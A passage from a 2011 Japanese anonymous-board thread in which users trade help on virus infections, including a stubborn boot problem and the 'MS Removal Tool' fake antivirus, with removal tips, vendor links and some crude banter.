ウイルスバスター体験版を別パソコンからダウンロードし、インストールするも、
ウイルスは検出されず。
そもそもトレンドマイクロにつながらず、アップデート不可能。
手動で別パソコンからアップデートファイルを引っこ抜いてきて
感染パソコンにコピペしてみたけど、うまくいかず。
私は次の手として、何をすればよろしいのでしょうか。
うまい対策があったら教えてください。
926 :名無しさん@お腹いっぱい。:2011/04/08(金) 06:59:25.39
クリーンインストールするなら
パーティション作り直せよ(解放して確保)。
パーティション作り直せよ(解放して確保)。
927 : ◆N9P3SuvBPo :2011/04/08(金) 20:16:17.50
>925
電源を入れた時にCDドライブが一番初めに読み込まれるようになってますか?
電源を入れた時にCDドライブが一番初めに読み込まれるようになってますか?
928 :名無しさん@お腹いっぱい。:2011/04/08(金) 21:14:47.87
>>926
残念ながら回復コンソールにいけないので、FDISKにまでたどり着くことができません。
>>927
なっていますが、ブートセクタウイルスに邪魔されて、
XP CDROMから起動用プログラムを書き込んだあとにブルー画面へ飛ばされます。
セーフモードからブートセクタ修復コマンドを打ってみましたが直らず。
かなりしぶといです。
もはや残された道は、感染HDDを取り出してUSB接続→別なパソコンで起動して
感染HDDをFDISKしかないのでしょうか。
そうなると、USB接続キットを買ってこなくてはですね。
高くつきそうです。
残念ながら回復コンソールにいけないので、FDISKにまでたどり着くことができません。
>>927
なっていますが、ブートセクタウイルスに邪魔されて、
XP CDROMから起動用プログラムを書き込んだあとにブルー画面へ飛ばされます。
セーフモードからブートセクタ修復コマンドを打ってみましたが直らず。
かなりしぶといです。
もはや残された道は、感染HDDを取り出してUSB接続→別なパソコンで起動して
感染HDDをFDISKしかないのでしょうか。
そうなると、USB接続キットを買ってこなくてはですね。
高くつきそうです。
929 :名無しさん@お腹いっぱい。:2011/04/08(金) 21:28:20.12
クリーンインストールするなら回復コンソール関係ないから大丈夫
930 :名無しさん@お腹いっぱい。:2011/04/08(金) 21:32:13.83
931 :名無しさん@お腹いっぱい。:2011/04/08(金) 21:33:42.58
>>928
横からだが
感染したXPを起動してから上書きしようとしてるだろ?
リカバリディスク(CD/DVD-ROM)からブートしないと意味ないぞ
というか付け焼刃の知識でいろいろ勘違いしているように見受けられる
横からだが
感染したXPを起動してから上書きしようとしてるだろ?
リカバリディスク(CD/DVD-ROM)からブートしないと意味ないぞ
というか付け焼刃の知識でいろいろ勘違いしているように見受けられる
932 :名無しさん@お腹いっぱい。:2011/04/08(金) 21:40:16.83
933 : ◆N9P3SuvBPo :2011/04/08(金) 21:52:31.91
>928
BIOSセットアップメニュー確認したんですよね。
それならもうどうすることもできないですよ…
修理に出すしかありません。
BIOSセットアップメニュー確認したんですよね。
それならもうどうすることもできないですよ…
修理に出すしかありません。
934 :名無しさん@お腹いっぱい。:2011/04/08(金) 22:06:24.80
>>925
HDDまるごと抹消してクリーンインストールできれば・・・
今の状態で抹消ソフトをリムーバブルドライブに書き込めればだが。
いっそうのこと1.5T以下のHDDは安いから思い切って新規購入したら?
HDDまるごと抹消してクリーンインストールできれば・・・
今の状態で抹消ソフトをリムーバブルドライブに書き込めればだが。
いっそうのこと1.5T以下のHDDは安いから思い切って新規購入したら?
936 :名無しさん@お腹いっぱい。:2011/04/08(金) 23:06:37.45
USBメモリ起動を試みる→HDD抹消に成功。
OSインストールをすべくXP CDROMから起動→ブルー画面。
あれ・・・?
Biosをひとつひとつ確認していったら、、、
なんと、Biosまで書き換えられていました。
これほどまでにしぶといウイルスは初めてでした。
でもなんとか復旧できそうです。
たくさんのアドバイス、ありがとうございました。
ほんと、みなさんのおかげです。
OSインストールをすべくXP CDROMから起動→ブルー画面。
あれ・・・?
Biosをひとつひとつ確認していったら、、、
なんと、Biosまで書き換えられていました。
これほどまでにしぶといウイルスは初めてでした。
でもなんとか復旧できそうです。
たくさんのアドバイス、ありがとうございました。
ほんと、みなさんのおかげです。
938 :名無しさん@お腹いっぱい。:2011/04/09(土) 11:24:11.14
どう見ても故障です
ありがとうございました
ありがとうございました
939 :名無しさん@お腹いっぱい。:2011/04/09(土) 21:36:38.03
BIOSのなにが書き換えられると、ブルースクリーンになるんだ??
940 :名無しさん@お腹いっぱい。:2011/04/09(土) 23:00:12.24
【使用OS】
Windows 7 64bit
【Microsoft Update(MU)の状態】
最新
【使用セキュリティソフトとバージョン】
Norton Internet Security 2011 + ノートン パワー イレイサー
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
最新
【スパイウェア対策ソフト】
SpywareBlaster
【スパイウェア対策ソフトの更新は定期的に行なっているか】
最新
【ルータの有無】
有り BUFFALO BBR-4HG
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ALSyslO64.sysというファイルについてです
ノートン パワー イレイサーを使用するとTempフォルダーから「ALSyslO64.sys」というファイルが検出されます
しかしTemp フォルダーを確認すると既にそこにはありません
Norton Internet Security本体でスキャン(セーフ モードでも)しても検出されません
昨日と今日、計二回スキャンしましたが両日とも検出されました。しかし再度スキャンかけてみると検出されなくなっています
ググってもヒットしませんがこれが何か分かる方いらっしゃいますか?
Windows 7 64bit
【Microsoft Update(MU)の状態】
最新
【使用セキュリティソフトとバージョン】
Norton Internet Security 2011 + ノートン パワー イレイサー
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
最新
【スパイウェア対策ソフト】
SpywareBlaster
【スパイウェア対策ソフトの更新は定期的に行なっているか】
最新
【ルータの有無】
有り BUFFALO BBR-4HG
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ALSyslO64.sysというファイルについてです
ノートン パワー イレイサーを使用するとTempフォルダーから「ALSyslO64.sys」というファイルが検出されます
しかしTemp フォルダーを確認すると既にそこにはありません
Norton Internet Security本体でスキャン(セーフ モードでも)しても検出されません
昨日と今日、計二回スキャンしましたが両日とも検出されました。しかし再度スキャンかけてみると検出されなくなっています
ググってもヒットしませんがこれが何か分かる方いらっしゃいますか?
941 :名無しさん@お腹いっぱい。:2011/04/10(日) 00:04:03.98
>>940
Core Tempのドライバじゃないか?
Core Tempのドライバじゃないか?
942 :名無しさん@お腹いっぱい。:2011/04/10(日) 04:50:39.59
サイトを見ただけで感染するウィルスがあるそうですが
どういう仕組みで感染するのですか?
どういう仕組みで感染するのですか?
943 :名無しさん@お腹いっぱい。:2011/04/10(日) 04:52:11.75
javascript
945 :名無しさん@お腹いっぱい。:2011/04/10(日) 16:24:01.24
>944
ttp://security.symantec.com/nbrt/npe.asp?lcid=1041
>ノートン パワー イレイサーは、強硬な手段を使ってこのような脅威を検出するので、
>正規のプログラムが駆除の対象となる危険性があります。
>このツールは非常に慎重に、かつほかに方法がない場合にのみお使いください。
誤検出だろうに
こういうツールは理解して使わんとダメだろ
↓Core Tempフォーラムの回答
ttp://www.alcpu.com/forums/viewtopic.php?t=292&highlight=alsysio
ttp://security.symantec.com/nbrt/npe.asp?lcid=1041
>ノートン パワー イレイサーは、強硬な手段を使ってこのような脅威を検出するので、
>正規のプログラムが駆除の対象となる危険性があります。
>このツールは非常に慎重に、かつほかに方法がない場合にのみお使いください。
誤検出だろうに
こういうツールは理解して使わんとダメだろ
↓Core Tempフォーラムの回答
ttp://www.alcpu.com/forums/viewtopic.php?t=292&highlight=alsysio
946 :名無しさん@お腹いっぱい。:2011/04/10(日) 18:46:50.65
>>945
こっちは常に闘ってんだよ
こっちは常に闘ってんだよ
947 :名無しさん@お腹いっぱい。:2011/04/10(日) 18:59:49.59
戦わずして勝つ俺には無用
948 :名無しさん@お腹いっぱい。:2011/04/10(日) 21:58:23.92
つーかノートンて(笑)
949 :名無しさん@お腹いっぱい。:2011/04/10(日) 23:51:06.74
MS Removal Tool にやられました
タスクマネージャーも開きませんorz
タスクマネージャーも開きませんorz
950 :名無しさん@お腹いっぱい。:2011/04/10(日) 23:54:37.89
ざまぁwww
951 :名無しさん@お腹いっぱい。:2011/04/11(月) 00:04:22.99
MS Removal Tool 始めました
952 :名無しさん@お腹いっぱい。:2011/04/11(月) 00:05:31.98
MS Removalはよく聞くけどどこで踏んでるんだ
953 :名無しさん@お腹いっぱい。:2011/04/11(月) 00:13:19.30
>>949
URLはどこだよ
URLはどこだよ
954 :名無しさん@お腹いっぱい。:2011/04/11(月) 00:31:40.30
>>953
たぶん mediafire.com か 4shared.com だと思う
たぶん mediafire.com か 4shared.com だと思う
955 :名無しさん@お腹いっぱい。:2011/04/11(月) 07:29:49.02
Cドライブをスキャンしている時はパソコンのスペックに関係なく重くなりますか?
956 :名無しさん@お腹いっぱい。:2011/04/11(月) 20:42:22.80
MS removal tollに感染して、いろんなサイトをみてとりあえづレジストコードを入力し、その後Malwarebytes' Anti-Malwareにて検索しました。
その後再起動しましたが、MS removal tollが自動的に立ち上がりIEなど起動できない等の症状は改ざんされたんですが、右下にアイコンが残っているのでまだ削除できてないようです。
Malwarebytes' Anti-Malwareではだめなんでしょうか?
いちおう今Malwarebytes' Anti-Malwareでまた検索していますが、他に有効な方法ご存知でしたら教えてください。
その後再起動しましたが、MS removal tollが自動的に立ち上がりIEなど起動できない等の症状は改ざんされたんですが、右下にアイコンが残っているのでまだ削除できてないようです。
Malwarebytes' Anti-Malwareではだめなんでしょうか?
いちおう今Malwarebytes' Anti-Malwareでまた検索していますが、他に有効な方法ご存知でしたら教えてください。
957 :名無しさん@お腹いっぱい。:2011/04/11(月) 21:00:37.06
958 :名無しさん@お腹いっぱい。:2011/04/11(月) 21:03:34.75
>>956
ごめん、こっち
http://www.spywareremove.com/removeMSRemovalTool.html
http://translate.google.com/translate?u=http://www.spywareremove.com/removeMSRemovalTool.html&langpair=en|ja&hl=ja&ie=UTF-8&oe=UTF-8
ごめん、こっち
http://www.spywareremove.com/removeMSRemovalTool.html
http://translate.google.com/translate?u=http://www.spywareremove.com/removeMSRemovalTool.html&langpair=en|ja&hl=ja&ie=UTF-8&oe=UTF-8
959 :名無しさん@お腹いっぱい。:2011/04/11(月) 21:45:08.13
MS removal toolやられた
これって時限爆弾みたいなウイルスなのか?
Malwerebyteでスキャンしたら3/25更新になってたんだが。
3/25に感染してずっと潜んでたってことか?
つーか2chとyoutubeとアフィサイトしか見てないんだけど
>>956
レジストコードいらなくない?
レジストコードの入力欄にカーソル置いただけでレジストしたことになってたんだけど
これって時限爆弾みたいなウイルスなのか?
Malwerebyteでスキャンしたら3/25更新になってたんだが。
3/25に感染してずっと潜んでたってことか?
つーか2chとyoutubeとアフィサイトしか見てないんだけど
>>956
レジストコードいらなくない?
レジストコードの入力欄にカーソル置いただけでレジストしたことになってたんだけど
960 :名無しさん@お腹いっぱい。:2011/04/11(月) 22:31:58.20
MS removal toolにやられたわウィルスとか初めて
961 :名無しさん@お腹いっぱい。:2011/04/11(月) 22:38:15.26
すみません、困っております。
知り合いからファイルをもらって起動したらエラー吐いてエクスプローラが落ちました。
再起動してみたら、なにかスクリプトエラーみたいなのが表示され
涙が枯れるまで〜のウェブサイトがブラクラのようにひらきまくります。
ウィルスソフト(ウィルスバスタークラウド)でチェックしても検出されず
なにをしたらそれが消えるのかわかりません。
OSはXP SP2です。
すみませんがわかる方いらっしゃいませんでしょうか・・・
知り合いからファイルをもらって起動したらエラー吐いてエクスプローラが落ちました。
再起動してみたら、なにかスクリプトエラーみたいなのが表示され
涙が枯れるまで〜のウェブサイトがブラクラのようにひらきまくります。
ウィルスソフト(ウィルスバスタークラウド)でチェックしても検出されず
なにをしたらそれが消えるのかわかりません。
OSはXP SP2です。
すみませんがわかる方いらっしゃいませんでしょうか・・・
962 :名無しさん@お腹いっぱい。:2011/04/11(月) 22:39:59.45
今日 MS removal tool に感染
流行ってるね
除去は簡単
流行ってるね
除去は簡単
963 :名無しさん@お腹いっぱい。:2011/04/11(月) 22:44:33.98
964 :名無しさん@お腹いっぱい。:2011/04/11(月) 22:50:19.08
ms removal tool除去法
スタート>すべてのプログラム>windows Defender>ツール>
ソフトウェアエクスプローラ>不明な発行元のプログラムを削除
cドライブのプログラムデータにも同じ名前があるから削除
スタート>すべてのプログラム>windows Defender>ツール>
ソフトウェアエクスプローラ>不明な発行元のプログラムを削除
cドライブのプログラムデータにも同じ名前があるから削除
965 :名無しさん@お腹いっぱい。:2011/04/11(月) 23:16:19.85
966 :名無しさん@お腹いっぱい。:2011/04/11(月) 23:43:13.52
MFの広告フラッシュにウイルス入ってるのかも
967 :名無しさん@お腹いっぱい。:2011/04/11(月) 23:52:35.67
広告フラッシュに入っている可能性が高い
俺の場合タイミングとしてはフラッシュでやられたと思う
俺の場合タイミングとしてはフラッシュでやられたと思う
968 :名無しさん@お腹いっぱい。:2011/04/11(月) 23:54:05.27
どこのだよ
969 :名無しさん@お腹いっぱい。:2011/04/12(火) 00:15:01.40
まぁ洋物エロサイトみたいに人に言えないようなサイトなんだろう
俺が踏んだ時はViralDeath(グロサイト)だった
感染する奴はJavaやAdobeReaderが古い
俺が踏んだ時はViralDeath(グロサイト)だった
感染する奴はJavaやAdobeReaderが古い
970 :名無しさん@お腹いっぱい。:2011/04/12(火) 02:10:21.16
感染から発動までタイムラグがあるのは何でだろう?
自分はWindowsUpdateのタイミングで動きだした
潜んでる間、キーロガー的なスパイウェアが動いてたりしないよね?
クレカの番号打ち込ませるためだけのウイルスなのか?
自分はWindowsUpdateのタイミングで動きだした
潜んでる間、キーロガー的なスパイウェアが動いてたりしないよね?
クレカの番号打ち込ませるためだけのウイルスなのか?
971 : 忍法帖【Lv=15,xxxPT】 :2011/04/12(火) 02:16:29.78
感染してみたい
次スレって970が立てることになってる?
立てられないから誰か頼む
マジすまない
立てられないから誰か頼む
マジすまない
973 :名無しさん@お腹いっぱい。:2011/04/12(火) 11:56:08.37
俺もMS removal toolに昨日引っかかったけどたまたまどっかのブログで記事読んでたから10分で駆除できたな
ええエロサイトです
ええエロサイトです
974 :名無しさん@お腹いっぱい。:2011/04/12(火) 12:03:07.55
2回目食らった
マジで何が原因なのかさっぱり
マジで何が原因なのかさっぱり
975 :名無しさん@お腹いっぱい。:2011/04/12(火) 18:04:03.34
FlashPlayerに脆弱性
ttp://www.adobe.com/support/security/advisories/apsa11-02.html
Wordとかに埋め込んでメールで飛んでくる標的型だったけど
バレちゃったのでSQLインジェクションとかであちこちのサイトに仕掛けてくるんじゃないかな
またOKWaveとかYahoo!知恵遅れとかでインチキセキュソフトで阿鼻叫喚とか胸熱
ttp://www.adobe.com/support/security/advisories/apsa11-02.html
Wordとかに埋め込んでメールで飛んでくる標的型だったけど
バレちゃったのでSQLインジェクションとかであちこちのサイトに仕掛けてくるんじゃないかな
またOKWaveとかYahoo!知恵遅れとかでインチキセキュソフトで阿鼻叫喚とか胸熱
976 :名無しさん@お腹いっぱい。:2011/04/12(火) 18:23:28.10
977 :名無しさん@お腹いっぱい。:2011/04/12(火) 18:58:25.48
質問です。
洒落で落としたゲームをマウントしたらデスクトップがキモオタ〜とかいう名前の画像でうめつくされてしまいました。
レジストリエディタまでは開けたのですが、ここからなにをしていいのかわかりません。
なにか対策があればなにとぞ教えてください。
洒落で落としたゲームをマウントしたらデスクトップがキモオタ〜とかいう名前の画像でうめつくされてしまいました。
レジストリエディタまでは開けたのですが、ここからなにをしていいのかわかりません。
なにか対策があればなにとぞ教えてください。
978 :名無しさん@お腹いっぱい。:2011/04/12(火) 19:03:59.61
>>977
ダウソ板で。ニュイルススレとか色々あるだろ。
ダウソ板で。ニュイルススレとか色々あるだろ。
979 :名無しさん@お腹いっぱい。:2011/04/12(火) 19:04:02.17
補足です
osはvistaです
スタートも開けずタスクマネージャとレジストリエディタ以外はなにも開けませんでした
よろしくお願いします
osはvistaです
スタートも開けずタスクマネージャとレジストリエディタ以外はなにも開けませんでした
よろしくお願いします
980 :名無しさん@お腹いっぱい。:2011/04/12(火) 19:08:16.30
981 :名無しさん@お腹いっぱい。:2011/04/12(火) 20:20:07.94
菅チョクトウィルスに感染してしまいました
982 :名無しさん@お腹いっぱい。:2011/04/12(火) 20:28:42.13
>>979
割れ厨ざまぁ
割れ厨ざまぁ
983 :名無しさん@お腹いっぱい。:2011/04/12(火) 20:34:20.93
>>981
菅チョクトwwww
菅チョクトwwww
984 :名無しさん@お腹いっぱい。:2011/04/13(水) 17:50:59.44
XP Antispyware とか Systemtoolsの感染をブロックできるウィルス対策ソフトってある?
Symantec Endpoint Protectionはダメだった。
Symantec Endpoint Protectionはダメだった。
985 :名無しさん@お腹いっぱい。:2011/04/14(木) 05:35:49.22
MS removal はJavaを使って感染させている感じ。
普段 ActiveXを無効にして使っているので、踏むことはないと思っていたら感染してた。
削除後は、Javaも無効にしたよ。
普段 ActiveXを無効にして使っているので、踏むことはないと思っていたら感染してた。
削除後は、Javaも無効にしたよ。
986 :名無しさん@お腹いっぱい。:2011/04/14(木) 15:22:19.49
>>985
俺もJavaが出た後にMS removal感染した
俺もJavaが出た後にMS removal感染した
987 : 忍法帖【Lv=17,xxxPT】 :2011/04/14(木) 16:49:42.52
どこで感染してるのか、の方が関心がある
988 :名無しさん@お腹いっぱい。:2011/04/14(木) 17:44:25.21
989 :名無しさん@お腹いっぱい。:2011/04/14(木) 17:59:38.62
990 :名無しさん@お腹いっぱい。:2011/04/14(木) 18:09:56.46
感染したアホ共のためにトレンドマイクロさまが尻公開してるから使え
ttp://blog.trendmicro.co.jp/archives/4086
Java更新しろAdobeReader更新しろ
ttp://geocities.yahoo.co.jp/gl/gbmogiki/view/20110411/1302519329
ttp://blog.trendmicro.co.jp/archives/4086
Java更新しろAdobeReader更新しろ
ttp://geocities.yahoo.co.jp/gl/gbmogiki/view/20110411/1302519329
あの…どなたか>>884に答えていただけないでしょうか…
992 :名無しさん@お腹いっぱい。:2011/04/14(木) 18:51:49.93
> クレジットカードの情報が送信されるのを防ぎました
> というウイルスバスター2011クラウドの表示が出てきて
自分で答えてるじゃんw
> というウイルスバスター2011クラウドの表示が出てきて
自分で答えてるじゃんw
993 :名無しさん@お腹いっぱい。:2011/04/14(木) 19:57:57.89
バスタースレで聞けよ
994 :名無しさん@お腹いっぱい。:2011/04/14(木) 23:33:36.88
>>961と同じようなウイルスに感染したっぽいんだけど何か解決案ない?
システムの復元はポイントないからできない
システムの復元はポイントないからできない
995 :名無しさん@お腹いっぱい。:2011/04/15(金) 00:04:07.96
次スレって立てたほうがいいのかな?
996 :名無しさん@お腹いっぱい。:2011/04/15(金) 03:33:56.10
>>994
爆発する前に2階の窓から投げるんだ
爆発する前に2階の窓から投げるんだ
997 : 忍法帖【Lv=1,xxxP】 :2011/04/15(金) 17:58:02.22
質問なんですが、
c:\windows\system32\mibccxyx.dll
これはどういったシステムなんでしょうか?
c:\windows\system32\mibccxyx.dll
これはどういったシステムなんでしょうか?
998 :名無しさん@お腹いっぱい。:2011/04/15(金) 18:11:55.81
仮にウイルスならファイル名なんかランダムなことが多いから何の参考にもならんよ
VT ttp://www.virustotal.com/ にでも投げてみれ
VT ttp://www.virustotal.com/ にでも投げてみれ
999 : 忍法帖【Lv=19,xxxPT】 :2011/04/16(土) 00:49:50.08
!ninja
1000 :名無しさん@お腹いっぱい。:2011/04/16(土) 00:53:45.41
2げっと
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。